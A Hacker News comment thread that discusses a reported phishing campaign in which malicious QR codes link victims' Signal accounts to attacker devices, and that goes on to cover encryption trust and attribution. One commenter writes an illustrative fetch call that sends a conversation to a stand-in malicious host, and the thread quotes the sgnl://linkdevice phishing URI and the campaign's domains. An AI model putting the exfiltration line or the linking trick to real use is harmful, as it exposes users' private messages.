Signal (and basically any app) with a linked devices workflow has been risky for awhile now. I touched on this last year (https://news.ycombinator.com/context?id=40303736) when Telegram was trash talking Signal -- and its implementation of linked devices has been problematic for a long time: https://eprint.iacr.org/2021/626.pdf.

I'm only surprised it took this long for an in-the-wild attack to appear in open literature.

It certainly doesn't help that signal themselves have discounted this attack (quoted from the iacr eprint paper):

    "We disclosed our findings to the Signal organization on October 20, 2020, and received an answer on October 28, 2020. In summary, they state that they do not treat a compromise of long-term secrets as part of their adversarial model"
If I'm reading that right, the attack assumes the attacker has (among other things) a private key (IK) stored only on the user's device, and the user's password.

Thus, engaging on this attack would seem to require hardware access to one of the victims' devices (or some other backdoor), in which case you've already lost.

Correct me if I'm wrong, but that doesn't seem particularly dangerous to me? As always, security of your physical hardware (and not falling for phishing attacks) is paramount.

No, it means that if you approve a device to link, and you later have reason to unlink the device, you can't establish absolutely that the unlinked device can no longer access messages, or decrypt messages involving an account, breaking the forward-secrecy guarantees.

That leaves you with the only remedy for a signal account that has accepted a link to a 'bad device' being to burn the whole account. (maybe rotating safety numbers/keys would be sufficient, i am uncertain there) -- If you can prove the malicious link was only a link, then yeah, the attack i described is incomplete, but the issues in general with linked devices and remedies described are the important bits, I think.

That's not what the attack does tho - they have access to your private key so they can complete the linking protocol without your phone and add as many devices as they want (up to the allowed limit). If you add a bad device, you are screwed from that moment on, assuming you don't sync your chat history.

You can always see how many devices a user has: they have a unique integer id so if I wanna send you a message, I generate a new encrypted version for each device. If the UI does not show your devices properly than that is an oversight for sure, but I don't think it's the case anymore.

Either way, you'd have to trust that the Signal server is honest and tells you about all your devices. To avoid that, you need proofs that every Signal user has the save view on your account (keys), which is why key transparency is such an important feature.

That sounds exactly like what GP wrote.
That is really quite bad.
It sounds like all that's needed is a device that had been linked in the past. Unlinking doesn't have the security requirements you'd think it would and there's a phishing attack to make scanning a QR code trigger a device link (which seems really really bad if the user doesn't even have to take much action)
Your phone (primary device) and the linked ones have to share the IK since that is the "root of trust" for you account: with that you generate new device keys, renew them and so on.

Those keys are backed by Keystore on Android, and some similar system on Windows/Linux, i'd assume the same for MacOS/iOS (but I don't know the details) so it's not as simple as just having access to your laptop, they'd need at least root.

Phishing is always tricky, probably impossible to counter sadly - each one of us would be susceptible at the wrong moment.

I think the point is that as a user you expect revocation of trust to protect you going forward, yet it doesn’t (e.g. the server shouldn’t be forwarding new messages to). That’s a design decision Signal made but clearly it’s one that leaves you open to harm. Moreover, it’s a dangerous decision because after obtaining the IK in some way (e.g. stolen device) you’re able to then essentially surreptitiously take over the account without the user ever knowing (i.e. no phishing needed). As an end user these are surprising design choices and that Signal discounted this as not part of their threat model to me suggest their threat model has an intentional or unintentional hole; second-hand devices that aren’t wiped are common & jail breaks exist.

This isn’t intractable either. You could imagine various protocols where having the IK is insufficient for receiving new messages going forward or impersonating sending messages. A simple one would be that each new device establishes a new key that the server recognizes as pertaining to that device and notifications are encrypted with a per-device key when sending to a device and require outbound messages to be similarly encrypted. There’s probably better schemes than this naive approach.

Revocation of trust is always a tricky issue, you can look at TLS certificates to see what a can of worms that is.

The Signal server does not forward messages to your devices, and the list of devices someone has (including your own) can and has to be queried to communicate with them, since each device will establish unique keys signed by that IK, so it isn't as bad as having invisible devices that you'd never aware of. That of course relies on you being able to ensure the server is honest, and consistent, but this is already work in progress they are doing.

I think most of the issue here doesn't lie in the protocol design but in (1) how you "detect" the failure scenarios (like here, if your phone is informed a new device was added, without you pressing the Link button, you can assume something's phishy), (2) how do you properly warn people when something bad happens and (3) how do you inform users such that you both have a similar mental model. You also have to achieve these things without overwhelming them.

I would be surprised if there aren’t ways to design it cryptographically to ensure that an unlinked device doesn’t have access to future messages. The problem with how Signal has designed it is that is a known weakness that Signal has dismissed in the past.
“Just install this chrome browser extension” is all it takes now. Hell, you can even access cookies and previously visited sites from within the browser. All it takes is some funky ad, or chrome extension, or some llama-powered toolbar to gain access to be able to do exactly that.

Background services on devices has been a thing for a while too. Install an app (which you grant all permissions to when asked) and bam, a self-restarting daemon service tracking your location, search history, photos, contacts, notes, email, etc

How is that related in any way to Signal?
My point is that anything you install on your device is a vector. Can install MITM attacks. Can read your data, etc. Sidecar attacks.

This was classic phishing though

  • ·
  • 1 day ago
  • ·
  • [ - ]
This is my read as well. Just double clicking here.
The attack in that paper assumes you have compromised the user's long term private identity key (IK) which is used to derive all the other keys in the signal protocol.

Outside of lab settings, the only way to do that is: - (1) you get root access to the user's device - (2) you compromise a recent chat backup

The campaign Google found is akin to phishing, so not as problematic on a technical level. How do you warn someone they might be doing something dangerous in an entire can of worms in Usable Security... but it's gonna become even more relevant for Signal once adding a new linked device will also copy your message history (and last 45 days of attachments).

If one doesn't use the linked device feature, does that impact this threat surface?
About the paper: if someone has gotten access to your identity (private) key, you are compromised, either with their attack (adding a linked device) or just getting MitM'ed and all messages decrypted. The attacker won.

The attack presented by Google is just classical phishing. In this case, if linked devices are disabled or don't exist, sure, you're safe. But if the underlying attack has a different premise (for example, "You need to update to this Signal apk here"), it could still work.

One thing I'm realizing more and more (I've been building an encrypted AI chat service which is powered by encrypted CRDTs) is that "E2E encryption" really requires the client to be built and verified by the end user. I mean end of the day you can put a one-line fetch/analytics-tracker/etc on the rendering side and everything your protocol claimed to do becomes useless. That even goes further to the OS that the rendering is done on.

The last bit adds an interesting facet, even if you manage to open source the client and manage to make it verifiably buildable by the user, you still need to distribute it on the iOS store. Anything can happen in the publish process. I use iOS as the example because its particularly tricky to load your own build of an application.

And then if you did that, you still need to do it all on the other side of the chat too, assuming its a multi party chat.

You can have every cute protocol known to man, best encryption algorithms on the wire, etc but end of the day its all trust.

I mention this because these days I worry more that using something like signal actually makes you a target for snooping under the false guise that you are in a totally secure environment. If I were a government agency with intent to snoop I'd focus my resources on Signal users, they have the most to hide.

Sometimes it all feels pointless (besides encrypted storage).

I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

You will always have to root your trust in something, assuming you cannot control the entire pipeline from the sand that becomes the CPU silicone, through the OS and all the way to how packets are forwarded from you to the person on the other end.

This makes that entire goal moot; eliminating trust thus seems impossible, you're just shifting around the things you're willing to trust, or hide them behind an abstraction.

I think what will become more important is to have enough mechanisms to be able to categorically prove if an entity you trust to a certain extent is acting maliciously, and hold them accountable. If economic incentives are not enough to trust a "big guy", what remains is to give all the "little guys" a good enough loudspeaker to point distrust.

A few examples: - certificate transparency logs so your traffic is not MitM'ed - reproducible builds so the binary you get matches the public open source code you expect it does (regardless of its quality) - key transparency, so when you chat with someone on WhatsApp/Signal/iMessage you actually get the public keys you expect and not the NSA's

> This makes that entire goal moot

I agree. Perhaps it's why I find the discussions like nonce-lengths and randomness sources almost insane (in the sense of willfully missing the forrest from the trees). Intelligence agencies have managed to penetrate the most secretive and powerful organizations known to man. Why would one think Signal's supply chain is impervious? I'd assume the opposite.

But depending on your threat model, it can still be useful. If a state actor has a backdoor into something, would they burn that capability to get you? If you are a dissident in a totalitarian government, you would expect them to throw everything at you and not tell anyone how/why. If you are terrorizing and could be tried in a “classified” setting, you would expect them to throw everything at you. If you are Jane Average passing nudes and talking about doing a little Molly last weekend and would have a lawyer go through discovery, you are probably safe.
I don't think they are insane, they are quite useful when designing security mechanisms, while at the same time being utter noise for the end-user benefiting from that system.

> If you're building a chip to generate prime numbers I do surely hope you know how to select randomness or make constant time & branch free algorithms, just like an engineer designing elevators better know what should be the tensile strength of the cable it'll use. In either cases, it's mumbo jumbo for me, and I just need to get on with my day.

Part of what muddies the water is our collective inability to separate the two contexts, or empower tech communicators to do it. If we keep making new tech akin to esoteric magic, no one will board the elevator.

I almost find it worse. Using your analogy its akin to doing atomic simulations on the elevator cable quality, but the elevator car is missing a bottom/floor.
I agree with you that the cart seems to be moving ahead of the horse, in that there is an increasing fixation on the theoretical status of the encryption scheme rather than the practical risk of various outcomes. An important facet of this is that systems that attempt to be too secure will prevent users from reading their own messages and hence will induce those users to use "less secure" systems. (This has been a problem on Matrix, where clients have often not clearly communicated to users that logging out can result in permanently missed messages.)

There's a part of me that wonders whether some of the more hardcore desiderata like perfect forward secrecy are, in practical terms, incompatible with what users want from messaging. What users want is "I can see all of my own messages whenever I want to and no one else can ever see any of them." This is very hard to achieve. There is a fundamental tension between "security" and things like password resets or "lost my phone" recovery.

I think if people fully understood the full range of possible outcomes, a fair number wouldn't actually want the strongest E2EE protection. Rather, what they want are promises on a different plane, such as ironclad legal guarantees (an extreme example being something like "if someone else looks at my messages they will go to jail for life"). People who want the highest level of technical security may have different priorities, but designing the systems for those priorities risks a backlash from users who aren't willing to accept those tradeoffs.

At a casual glance, any E2EE system can be reduced to your ironclad legally guaranteed (ILG) system by having the platform keep a copy of the key(s), for instance. So it doesn't have to be a one-or-the-other choice.
How does giving the platform the keys guarantee legal consequences for them if they use the keys to read your messages?
  • lmm
  • ·
  • 1 day ago
  • ·
  • [ - ]
> Sometimes it all feels pointless

Building anything that's meant to be properly secure - secure enough that you worry about the distinction between E2E encryption and client-server encryption - on top of iOS and Google Play Services is IMO pretty pointless yes. People who care about their security to that extent will put in the effort to use something other than an iPhone. (The way that Signal promoters call people who use cryptosystems they don't like LARPers is classic projection; there's no real threat model for which Signal actually makes sense, except maybe if you work for the US government).

> I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

There's definitely a streetlight effect where academic cryptography researchers focus on the mathematical algorithms. Nowadays the circle of what you can get funding to do security research on is a little wider (toy models of the end to end messaging protocol, essentially) but still not enough to encompass the full human-to-human part that actually matters.

> I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

I think your comment in general, and this part in particular, forgets what was the state of telecommunications 10-15 years ago. Nothing was encrypted. Doing anything on a public wifi was playing russian roulette, and signal intelligence agencies were having the time of their lives.

The issues you are highlighting _are_ present, of course; they were just of a lower priority than network encryption.

I think that part of what you are talking about is sometimes called "attestation". Basically a signature, with a root that you trust that confirms beyond doubt the provenience of the entity (phone + os + app) that you interact with.

Android has that and can confirm to a third party if the phone is running for example a locked bootloader with a Google signature and a Google OS. It's technically possible to have a different chain of trust and get remote parties to accept a Google phone + a Lineage OS(an example) "original" software.

The last part is the app. You could in theory attest the signature on the app, which the OS has access to and could provide to the remote party if needed.

A fully transparent attested artifact, which doesn't involve blind trust in a entity like Google, would use a ledger with hashes and binaries of the components being attested, instead of root of trust of signatures.

All of the above are technically possible, but not implemented today in such a way to make this feasible. I'm confident that with enough interest this will be eventually implemented.

> "E2E encryption" really requires the client to be built and verified by the end user

We probably agree that this is infeasible for the vast majority of people.

Luckily reproducible builds somewhat sidestep this in a more practical way.

I'll feel pessimistic like this, but then something like Tinfoil Chat [0] comes along and sparks my interest again. It's still all just theoretical to me, but at least I don't feel so bad about things.

With a little bit of hardware you could get a lot of assurance back: "Optical repeater inside the optocouplers of the data diode enforce direction of data transmission with the fundamental laws of physics."

[0] https://github.com/maqp/tfc

> "E2E encryption" really requires the client to be built and verified by the end user

But the OS might be compromised with a screen recorder or a keylogger. You'd need the full client, OS and hardware to be built by the end user. But then the client that they're sending to might be compromised... Or even that person might be compromised.

At the end of the day you have to put your trust somewhere, otherwise you can never communicate.

It’s primarily to guard against insider threats - E2E makes it very hard for one Signal employee to obtain everyone’s chat transcripts.

Anyone whose threat model includes well-resourced actors (like governments) should indeed be building their communications software from source in a trustworthy build environment. But then of course you still have to trust the hardware.

tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.

> tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.

This is sorta my point, lots of DC folks use Signal under the assumption they're protected from government snooping. Sometimes I feel like it could well have the opposite effect (via the selection bias of Signal users).

It is not plainly stated in the article, but as far as I understand, the first step of one of the attacks is to take the smartphone off a dead soldier’s body.
The article says they phish people into linking adversarial devices to their Signal:

> [...] threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, [...]

There's a new feature to sync old messages that seems like it could potentially make that attack vector ten times worse:

https://www.bleepingcomputer.com/news/security/signal-will-l...

Would a malicious URL be able to activate this feature as part of the request?

Probably not, in any normal case a secondary device shouldn't have that kind of authority to dictate.

It is more concerning if the toggle is on by default and then you carelessly press next (on this or some other kind of phish).

Is this serious?

It raises questions about smartphones being standard equipment for soldiers, but they do give every soldier an effective, powerful computing and communication platform (that they know without additional training).

The question is how to secure them, including against the risk described in the parent. That seems like a high risk to me I would expect someone is working on how to secure them enough that even Russian intelligence doesn't have an effective exploit.

The solutions may apply well to civilian privacy too, if they ever become more widespread. It wouldn't be the worst idea to secure Ukrainian civilian phones against Russian attackers.

I seem to recall uploaded selfies being a frequent source of problems. For example: https://www.rferl.org/a/trench-selfies-tracking-russia-milit...
Phones aren’t secure but are more secure than the standard radios most have access to.

Encrypted milspec comms aren’t the standard in a massive war.

It’s weird but discord, signal and some mapping apps on smartphones are how this war is being fought.

> Encrypted milspec comms aren’t the standard in a massive war.

It is standard in any modern military that is actually prepared for war. It's not like encrypted digital radio is some kind of fancy tech, either - it's readily available to civilians.

Ukraine in particular started working on a wholesale switch to encrypted Motorola radios shortly after the war began in 2014, and by now it's standard equipment across their forces. Russia, OTOH, started the war without a good solution, with patchwork of ad hoc solutions originating from enthusiasts in the units - e.g. https://en.wikipedia.org/wiki/Andrey_Morozov was a vocal proponent.

But smartphones are more than communications. You can also use them as artillery computers for firing solutions, for example. And while normally there would be a milspec solution for this purpose, those are usually designed with milspec artillery systems and munitions in mind, while both sides in this war are heavily reliant on stocks that are non-standard (to them) - Ukraine, obviously, with all the Western aid, but Russia also had to dig out a lot of old equipment that was not adequately handled. Apps are much easier to update for this purpose, so they're heavily used in practice (and, again, these are often grassroots developments, not something pushed top-down by brass).

At the start of the invasion in Ukraine it was possible for a while to listen to unencrypted radio comms from Russian convoys, hosted online live.
  • dmix
  • ·
  • 1 day ago
  • ·
  • [ - ]
Russians aren't allowed to bring phones on the frontlines apparently but Ukranians often do still as they have the combat management app which is critical to operations. I've always wondered if this is why there's far more published footage of Ukranian combat video than Russian. Beyond the donation incentive they attached to videos when publishing them on Youtube/Telegram.
In the first weeks of the war you could see Russian armored columns clearly on Google Maps as heavy traffic (along with other military activity but the columns really stood out). https://www.theverge.com/2022/2/28/22954426/google-disables-...
> I've always wondered if this is why there's far more published footage of Ukranian combat video than Russian.

I'm sure Russia's meat wave tactics have more of a role. If you're sending your troops in suicide missions, including guys without weapons and even in crutches, you're not exactly too keen in having them carrying mobile phones to document the experience or even, heavens forbid, survive by surrendering.

[flagged]
This meatwave meme needs to die. Again ,if Ukrainians are being beaten by guy in crutches,it says so much about this NATO armed and trained force
> This meatwave meme needs to die.

Are you sure it's a meme, though? There is plenty of footage out there, documenting meat wave tactics in 4k. Have you been living under a rock?

> Again ,if Ukrainians are being beaten by guy in crutches (...)

What's your definition of "being beaten"? Three years into Russia's 3-day invasion of Ukraine and Ukraine started invading and occupying Russian territory. Is this your definition of being beaten?

I'm not sure how applicable the NATO training is in this war. It's a trendsetter for sure
I think a large chunk of the footage is taken by gopros or similar, not smartphones.

And I think a pretty much all published Ukrainian and Russian combat footage is vetted by their respective military (who would want to be court martialed for Reddit karma?).

They just take different approaches to what, when and were to release the footage.

Where is the fighting, and who runs the cellular networks in that area?

I’d want to run military communications on a network my side controls

A radio on a soldier is already a dangerous communications device - with a radio you can call in artillery strikes, for example.

There's no particular need IMO to secure smartphones on the battlefield in anyway beyond standard counter-measures - i.e. encrypt the storage, use a passcode unlock.

The Russian military would beg to differ, see the sibling's comment: https://news.ycombinator.com/item?id=43106162
That's referring to people literally posting selfies online (with the result of giving away their location by either metadata or geo-guessing).

Which is a process and procedure issue, more then a security issue on the phones themselves (except in so far as it's really obvious there's a solid need for an OS for a battlefield device which strips all that stuff out by default).

Smartphones store data; radios (depending on the radio) do not. The Russian military likely has tools for bypassing typical security.
Soldiers are not allowed to carry a cell phone.
Is this suggesting that a single QR scan can on its own perform the device linking? If so, it seems like that's kind of the hole here, right? Like you shouldn't be able to scan a code that on its own links the device; you should have to manually confirm with like "Yes I want to link to this device". And then if you thought you were scanning a group invite code you'd realize you weren't. (Yeah, you'd still have to realize that, but I think it's a meaningful step up over just "you scanned a code to join a group and instead it silently linked a different device".)
> you should have to manually confirm with like "Yes I want to link to this device". And then if you thought you were scanning a group invite code you'd realize you weren't. (Yeah, you'd still have to realize that, but I think it's a meaningful step up over just "you scanned a code to join a group and instead it silently linked a different device".)

Remember that Signal is designed for non-technical users. Many/most do not understand QR codes, links, linking, etc, and they do not think much about it. They take an immediate, instinctive guess and click on something - often to get it off the screen so they can go back to what they were doing.

Do you have reason to think there is not confirmation? Maybe Signal's documentation will tell you.

> Do you have reason to think there is not confirmation?

The reason is just that in the article it says:

> threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance

That phrasing suggests to me that the scanning of the QR code, on its own, performs the linking. That may not be the case, but if so I'd say the wording is misleading or at least imprecise.

In fairness, I think it's misleading to you due to the details you are interested in. They don't say otherwise and they can't lay out every detail that anyone might be interested in; it's not an RFC.
> Maybe Signal's documentation will tell you.

Not the person you replied to, but I just tried googling half a dozen different terms and got results that have nothing to do with Signal.

> Remember that Signal is designed for non-technical users.

That does not prevent them from putting up a warning message that says "You just scanned a code which will allow another device to read all future messages sent to you, and send messages from your identity. Are you sure you want to do that? And the button says "link devices", not "yes" or "no."

I think the frustration here is that Signal petulantly and paternalistically refuses to allow you to fully sync to another device (and for years refused to even allow you to back up messages) because supposedly we can't be trusted with such a thing...but then they leave the QR code system so idiotically designed it's apparently trivial to phish people into linking their devices to malicious actors?

Why the fuck does scanning a QR code, without having first selected "link device", even open that dialog? Or require a PIN code they obsessively force us to re-enter all the time?

It's obviously ripe for abuse.

We admonish people for piping a remote document into their shell but a QR code that links devices with one click is OK?

> That does not prevent them from putting up a warning message that says "You just scanned a code which will allow another device to read all future messages sent to you, and send messages from your identity. Are you sure you want to do that? And the button says "link devices", not "yes" or "no."

As an experiment, I just linked a device to my Signal account. After clicking "Link new device" in Signal, and then scanning the QR code, a dialog popped up: "Link this device? This device will be able to see your groups and contacts, access your chats, and send messages in your name. [Cancel] [Link new device]"

If I scan the QR code with Google Lens instead, it reads and displays the sgnl://linkdevice... URL but does not launch (or offer to launch) Signal.

The good news is the target is targeted for a reason: it's still effective.
There are many voices which try to tell you that signal is compromised. Notice that all of those voices have less open-source-ness than Signal in virtually all cases.

Signal is doing its best to be a web scale company and also defend human rights. Individual dignity matters.

This is not a simple conversation.

> There are many voices which try to tell you that signal is compromised.

But compromised by whom? Russian, US Intelligence? I am really confused.

I just looked quickly on on the Signal Foundation website and the board members, I read things like:

> Maher is a term member of the Council on Foreign Relations, a World Economic Forum Young Global Leader, and a security fellow at the Truman National Security Project.

> She is an appointed member of the U.S. Department of State's Foreign Affairs Policy Board

> She received her Bachelor's degree in Middle Eastern and Islamic Studies in 2005 from New York University's College of Arts and Science, after studying at the Arabic Language Institute of the American University in Cairo, Egypt, and Institut français d'études arabes de Damas (L'IFEAD) in Damascus, Syria.

Those type of people sound part of the intelligence world to me. What exactly are they doing on the board of Signal (an open source messaging app)?

> This is not a simple conversation.

I agree

  • SXX
  • ·
  • 1 day ago
  • ·
  • [ - ]
And Telegram specifically bad here. Using custom crypto on custom protocol and dont have any E2EE by default whatsoever storing everything on server in plain text.
Also, it's a tricky environment of disinformation generally, and in particular for anything valuable like Signal. If Signal is secure, attackers on privacy would want people to believe Signal is compromised and to use something else. If it's not, then they would want people to believe Signal is secure.

I think the solution is to completely ignore any potential disinfo source, especially random people on social media (including HN). It's hard to do when that's where the social center is - you have to exclude yourself. Restrict yourself to legitimate, trusted voices.

I would also read it from another perspective. Attackers, especially at the level of nation states, will always try to get as many avenues for achieving their goals as possible.

If you have compromised a service, it would be in your interest to make it more popular (assuming you think you are the only one in possession of it).

If you cannot, you don't give up; you just go back to the drawing board (https://xkcd.com/538/). Maybe I don't need to break Signal if I can just rely on phishing or scare tactics to get what I want.

> web scale

I didn't realize anyone still used that term with a straight face.

"MongoDB is web scale, you turn it on and it scales right up."

I've struggled occasionally with trying to describe a similar concept without using that tainted term.
  • mppm
  • ·
  • 51 minutes ago
  • ·
  • [ - ]
Am I reading this right? You can initiate device linking in Signal by clicking on an external URL? This is so stupid, I don't even have words for this. In a security-focused app you should not be able to link anything, without manually going into the devices/link menu and clicking "link new device".
You can check for unexpected linked devices in the settings menu.
  • jzb
  • ·
  • 1 day ago
  • ·
  • [ - ]
I wonder if Signal should expose linked devices directly in the UI at all times. Something like a small icon that indicates "You have 3 linked devices active" or similar.
Would probably lead to notification fatigue.

Showing a big snackbar when a new device is added is probably enough, especially if the app can detect there was no "action" on your phone that triggered it.

Key transparency, once rolled out, would help to ensure there is no lingering "bad" device around, but phishing will always be a problem.

  • jzb
  • ·
  • 19 hours ago
  • ·
  • [ - ]
"Would probably lead to notification fatigue."

Probably true...

> Showing a big snackbar when

A big... what?

Can you tell me what this new lingo is for someone who doesn't use the latest and shittiest marketing lingo?

> latest and shittiest marketing lingo

It exists since Android 6: https://developer.android.com/reference/com/google/android/m...

Informative banner that does not require user interaction to dismiss.

Snackbar isn't a particularly new term, it goes back, IIRC, to the first version of Material Design and is similar to a toast but different in that snackbars may support interaction whereas toasts are non-interactive.
An in-app notification along the bottom of your screen. Usually just some text on a dark grey or black background.
> shittiest marketing lingo

Is that what you call the words you don't understand?

I think the trouble is information overload is a bit of a thing in this case. It's information that is 99% of the time useless, except the one time it isn't. But also, to an informed user is much less of a threat - the threat is anyone you interact with getting compromised.

EDIT: Like an analytics based approach would probably be far more useful - popping up a confirmation for example if GeoIP shows a device is far removed from all the others, which for most people would be true unless they were traveling.

Great idea, I'll send you a QR code...
They provided some domains, but not all of them are taken. For example, signal-protect[.]host is available, kropyva[.]site is available, signal-confirm[.]site is registered in Ukraine. Some of them are registered in Russia.

Never trust a country at war—any side. Party A blames B, Party B blames A, but both have their own agenda.

>signal-confirm[.]site is registered in Ukraine

The WHOIS is usually fake made up data so don't know why you are using that to claim it's registered in Ukraine. Russia is also known to use stolen credentials, SIM cards etc. from their neighbouring countries, including Ukraine, for things like this.

Then why should I trust the article at all? If WHOIS data is fake and stolen credentials are common (which I don't disagree with), I could register a domain, put your name on it, and make it look like you're behind the phishing. Would that make it true? After all, in war, deception is a legitimate tactic.
I believe you are making a mistake by thinking that since a malicious actor's domain is registered in Ukraine, it automatically must be doing something in the interests of Ukraine, or at least be known to its officials.

Lots of Russian state actors have no problems working from within Ukraine, alas. Add to this purely chaotic criminal actors who will go with the highest bidder, territories temporarily controlled by Russians that have people shuttle to Ukraine and back daily, and it becomes complicated very quickly.

Fair point. Just because a domain is registered in Ukraine doesn't mean it's acting in Ukraine's interests. But that works both ways. If Russian actors can operate from Ukraine, then Ukrainian actors (or others) can also operate from Russia, or at least make it look that way. Cyber attacks originating from Ukraine and targeting Russia aren't uncommon either, which only adds to the complexity of attribution.

The issue isn't just attribution but also affiliation. When similar attacks come from Ukraine targeting Russia, Google stays quiet. I understand that Russia invaded Ukraine, not the other way around, but given the complexity of the conflict, aligning with one side in cyber warfare reporting is a questionable move. At the end of the day, attacks will come from both sides - it's a war, after all.

Edit: when I say 'questionable move', I'm specifically referring to Google. It's unclear what they were trying to achieve with this article, is it a political statement or just a marketing piece showcasing how good GTIG is? Or both?

Ukrainian military are moving from Telegram, which presumably still has some ties to Russia despite the claims. And this is yet another phishing campaign in Ukrainian language that makes use of Ukrainian-registered domains to host fake Signal group invites to make Ukrainian military join and link their devices to an adversary-controlled machine. Who might be behind that attack? Hmm, let me think... I don't know! Probably Ukrainians themselves. Or it might be the US. Might as well be the Martians. We will never know the real truth, after all nobody is to be trusted during the war!

Stop the tiresome FUD please. This war is surprisingly straightforward by the standards of the last century, it's literally out of some decades-old textbook. Let's not drag this discussion here again. If you have specific issues with Google's attribution here, please state them, HN is pretty aware that attribution can be shaky. My only gripe with the article is the clickbait title: nobody says that someone is "targeting e-mail" about e-mail phishing.

  • Terr_
  • ·
  • 14 hours ago
  • ·
  • [ - ]
> Lots of Russian state actors have no problems working from within Ukraine, alas.

Ex: Viktor Yanukovych, prior to being ousted.

An unregistered domain can still be an IoC especially when found through e.g. payload analysis.
Oceania had always been at war with Eastasia.
[flagged]
"Russia-aligned threat"... so... the US?
> In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792.

Missing from their recommendations: Install No Script: https://noscript.net/

No Script is a browser extension. Signal is an Android/Ios/Electron app so no
In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792.

Source: https://cloud.google.com/blog/topics/threat-intelligence/rus...

They should add an option to not allow linking additional devices, if that’s feasible.
  • gck1
  • ·
  • 1 day ago
  • ·
  • [ - ]
> Android supports alphanumeric passwords, which offer significantly more security than numeric-only PINs or patterns.

Ironic, coming from Google. As Android is THE only OS where usage of alphanumeric passwords is nearly impossible, as Android limits the length of a password to arbitrary 16 characters, preventing usage of passphrases.

Kind of a good sign for signal's security that this is the best Russia has got!
I wouldn’t assume that but I also wouldn’t recommend against using Signal.
That we know of
Yeah, this just gave me the last nudge I needed to give Signal a go.
[flagged]
[flagged]
Interesting. Could you provide a better alternative? Preferably even remotely as user friendly as signal/whatsapp?
I found SimpleX recently (https://simplex.chat/), which got my attention because it uses a unique account schema that doesn't have any individual account identifiers. It's got some interesting features. Not sure about user-friendliness since I don't use other messaging apps to know what to expect.

It's mostly just interesting to me that they did away with the username entirely and they instead have users connect exclusively through shared secrets like they're Diffie and Hellman.

I don't have a good answer. Personally, I'm using Jami for secure communications but I won't pretend it replaces signal in terms of user-friendliness especially back when signal allowed SMS and secure communications in the same app!
Threema comes to mind.
Following the conversation down, it sounds like what you're really saying is that Signal stores sensitive information encrypted with PIN+SGX, which is controversial. And maybe you have a good argument for why it's bad (and I'm uneasy with it myself). But I think people don't like that you made the assumption for them that PIN+SGX is bad.
Even if everyone agreed that the system was secure, and they absolutely don't, see for example

https://web.archive.org/web/20210126201848mp_/https://palant...

https://www.vice.com/en/article/pkyzek/signal-new-pin-featur...

I think we should all agree that outright lying to users on the very first line of their privacy policy page is totally unacceptable.

You cited this so I think this is what you mean:

"Signal is designed to never collect or store any sensitive information."

I interpret this, I think reasonably, to not include encrypted information. For that matter they collect (but probably don't store) encrypted messages. The question is, does PIN+SGX qualify as sufficiently encrypted? This line is a lie only if it does not.

Sorry I skimmed those articles, I don't want to read them in depth. But it sounds like they are again ultimately saying "PIN+SGX is not secure enough".

> I interpret this, I think reasonably, to not include encrypted information

I disagree since attacks and leaks can happen/have happened which could compromise that data. Signal was already found to be vulnerable to CacheOut. Even ignoring that guessing or brute forcing a pin is all anyone would need to get a list of everyone a signal user has been in contact with. just having that data (and worse keeping it forever) is a risk that absolutely should be disclosed.

> I don't want to read them in depth. But it sounds like they are again ultimately saying "PIN+SGX is not secure enough".

that was my conclusion back when all this started. The glaring lie and omissions in their privacy policy were just salt in the wound, but charitably, it might be a dead canary intended to help warn people away from the service. Similarly dropping the popular feature of allowing unsecured sms/mms and introducing a crypto wallet nobody asked for might have also been done to discourage the apps use.

Okay, so you not only take issue with PIN+SGX, you think that any encryption scheme (at least from Signal) isn't secure enough. Your point still comes down to "they are storing sensitive information in a form that is ostensibly encrypted but still subject to attack (in the opinion of XYZ reputable people...)".

My point is only that the headline of your point was "they are lying about not storing sensitive information". That leaves out a very important part of your point. IMO it makes the claim seem sensationalized and starts you off on the wrong foot.

That's fair, I can see how someone could feel that way.
"I interpret this, I think reasonably, to not include encrypted information"

Why? Encrypted information is still sensitive information.

Maybe via metadata? The size of the information, etc. Do you mean that they should have a caveat about that?

Or if you want to be literal, you have to say that they're storing sensitive information even if it's encrypted. But by connotation that phrase implies that someone other than the user could conceivably have access to it. So for all any user could care, they just as well are not storing it. Do you mean that they should rephrase it so it's literally correct?

Or do you mean that it's actually bad for them to be collecting safely encrypted sensitive data? Because if so, you literally cannot accept any encrypted messenger because 3rd parties will always have access to it.

Yes, I think they should rephrase it so that it's literally correct. Personally, I have a very high trust in the safety of Signal's encryption and security practices. But privacy policies aren't for the Signals of the world, they're for the ad networks and sketchy providers. For example, many ad networks collect "Safely Encrypted" email addresses—but still are able to use that information to connect your Google search result ad clicks with your buying decisions on Walmart.com. Whether something is "safely" encrypted is a complicated, contextual decision based on your threat model, the design of the secure system in question, key custody, and lots of other complicated factors that should each be disclosed and explained, so that third parties can assess a service's data security practices. Signal is a great example of a service that does an excellent job explaining and disclosing this information, but the fact that their privacy policy contradicts their public docs lessens the value of privacy policies.
Okay that's fair. But as I said to autoexec, if your point includes that you don't rely on the encryption to be safe, you should probably include that in your point. A lot of people probably don't share that as a prior. (I suspect that's why autoexec was downvoted and flagged).
A ciphertext is not sensitive information. If your ciphertext can't be exposed to an adversary, your cryptography is fundamentally broken.
